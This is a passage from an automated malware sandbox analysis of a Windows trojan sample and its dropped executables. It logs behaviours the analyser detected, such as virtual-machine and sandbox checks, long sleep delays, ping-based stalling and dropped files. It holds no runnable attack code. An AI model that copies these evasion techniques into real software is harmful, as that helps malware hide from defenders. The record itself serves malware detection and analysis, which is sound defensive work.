        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Query firmware table information (likely to detect VMs)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSystem information queried: FirmwareTableInformation
        Tries to detect sandboxes / dynamic malware analysis system (registry check)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
        Uses ping.exe to sleep
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00401363 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,18_2_00401363
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow / User API: threadDelayed 932Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow / User API: threadDelayed 6586Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow / User API: threadDelayed 495Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 748
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 724
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_18-5362
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-7701
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winkvnav.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rckc.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winmxfy.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winfpnht.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeDropped PE file which has not been started: C:\voiv.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-590
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2228Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2240Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6532Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6340Thread sleep time: -62505s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2240Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 4452Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6212Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6212Thread sleep time: -98000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6284Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6284Thread sleep time: -2880000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2240Thread sleep time: -1800000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992Thread sleep time: -90000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 1868Thread sleep time: -48000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992Thread sleep count: 932 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992Thread sleep time: -477184s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7424Thread sleep time: -62965s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7440Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7420Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7424Thread sleep count: 53 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7420Thread sleep time: -1080000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7428Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7488Thread sleep count: 44 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7488Thread sleep time: -880000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7492Thread sleep count: 56 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7492Thread sleep time: -1120000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7492Thread sleep time: -1440000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7440Thread sleep count: 48 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7420Thread sleep time: -19800000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7424Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7416Thread sleep time: -900000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992Thread sleep count: 6586 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992Thread sleep time: -3372032s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 8092Thread sleep count: 495 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 8088Thread sleep time: -3600000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7744Thread sleep count: 164 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7744Thread sleep time: -1640000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 2416Thread sleep time: -1510000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 2444Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6476Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7928Thread sleep count: 149 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7928Thread sleep time: -1490000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 1964Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6024Thread sleep count: 148 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6024Thread sleep time: -1480000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7936Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 1952Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 3600Thread sleep count: 108 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 3600Thread sleep time: -1080000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6048Thread sleep count: 107 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6048Thread sleep time: -1070000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 3000Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6320Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6232Thread sleep count: 82 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6232Thread sleep time: -820000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7980Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 5232Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01441060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,1_2_01441060
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_0143A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,1_2_0143A2F5
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_004028ED memset,CreateToolhelp32Snapshot,Process32FirstW,GetSystemInfo,ReadProcessMemory,Process32NextW,Sleep,18_2_004028ED
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 62505Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 62965Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread delayed: delay time: 1800000Jump to behavior
        Source: jvauyc32.exe, 00000018.00000002.2160603432.00000000015B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
        Source: dwm.exe, 00000006.00000000.1584724657.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
        Source: explorer.exe, 00000017.00000000.1811548975.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.000000000087E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`X
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005F9F000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.0000000001381000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: SearchApp.exe, 0000001E.00000000.2062712948.000001D61AF87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001E.00000000.2093276203.000001D61C5A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;False]
        Source: svchost.exe, 00000014.00000000.1740893226.000001697A687000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4040879149.000001697A687000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: SearchApp.exe, 0000001E.00000000.2061430410.000001D61ACD5000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001E.00000000.2526387383.000001D630D8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"829FCEE88A524F41943F335B832D1A47","ConversationId":"d0438cf5-4bd5-480a-aeab-06785994a74c","LogicalId":"1f8c91c6-235c-4050-8639-720df71e4e93","tid":"651e7d8414ca4632956d0384c6530119","sid":"2E8B8FD9DBFE6CCB3A6B9C78DAFA6D14","uid":"","muid":"531305E83CE64DE088676FE94B9682C4","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651e7d8414ca4632956d0384c6530119 Ref B: MWHEEEAP0024F6E Ref C: 